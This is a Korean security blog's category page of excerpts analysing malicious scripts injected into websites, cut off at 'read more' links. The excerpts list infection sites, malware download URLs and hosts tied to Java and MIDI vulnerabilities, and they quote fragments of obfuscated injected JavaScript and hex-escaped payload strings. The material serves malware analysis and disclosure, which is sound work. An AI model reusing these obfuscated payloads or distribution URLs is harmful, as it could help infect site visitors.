본문 바로가기

악성 스크립트

http://ad.nsonmedia.com 내의 악성 스크립트 삽입 ! 감염 사이트 : http://ad.tiad.co.kr/mt2.html * 위 사이트는 현재도 감염중에 있습니다! 메인 사이트 : http://ad.tiad.co.kr/mt2.htm0 http://jips.kips.or.kr/ad.htm0 최종파일 다운 : http://61.251.187.176/kr/files/java.ex0 : http://jips.kips.or.kr/Applet.ja0 ~> JAVA 취약점 ~> temp%//happy.vbs 생성 http://jips.kips.or.kr/down.htm0 최종파일 다운 : http://61.251.187.176/kr/files/004.ex0 MID 취약점 다운로드 : http://jips.kips.or.kr/test_case.mi0 ~> MID 취약점.. 더보기
HTML/Infected.WebPage.Gen2 APNIC KR 감염 사이트 : http://yxlgok.net/bbs/board.php? bo_table=board_free&wr_id=78&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=3 메인 스크립트중 ! 이상한 스크립트 발견 ! function c102916999516m494180f401f90(m494180f40275f){ var m494180f402f30=16; return (parseInt(m494180f40275f,m494180f402f30));}function m494180f403ed1(m494180f4046a2){ function m494180f405e13(){return 2;} var m494180f404e72='';m494180f406db4=String.fromChar.. 더보기
오랜만에 보는 악성 스크립트 ! 제가 본 한 중국 사이트의 악성 스크립트 입니다 ! IE 버전을 확인한 이후에 위와 같은 스크립트에 연결 시켜 감염을 합니다 ! party.css 볼까요 var hua, hua1, hua2, hua3, hua4; hua='\x25'; var kao='\x25'; var shit='\x25'; var jj=hua+'u'+'4B5B'; var cao='\x25'; hua1='u'; kao+='u'; shit+='u'; var kk=hua+'u'+'CD36'; cao+='u'; hua2='58'; kao+='B'; shit+='B'; var ll=hua+'u'+'BD8F'; cao+='B'; hua3=hua+hua1+'5'; kao+='D'; shit+='D'; var mm=hua+'u'+'E9D0'; cao.. 더보기
Increase 를 이용한 악성 스크립트 ! 최근에는 그냥 window.alert(x) 로 출력 한다면 바로 나오는 출력 코드가 꽤 눈에 띄이고 있다. 뭐 내가 보는게 전부는 아니지만 최근에 alert(x) 출력을 하고도 또 다시 한번더 증가를 시켜주어야 하는 악성코드를 보아서 이렇게 글을 쓴다. 이 악성코드는 2010/10/05 에 나왔으며 지금은 보이지 않는 악성코드이다. function a(p){var j,t;j="";for(i=1;i 더보기
휴대폰 통신사 큐x텔 악성 스크립트 삽입 !! 지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,. 사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !! 더보기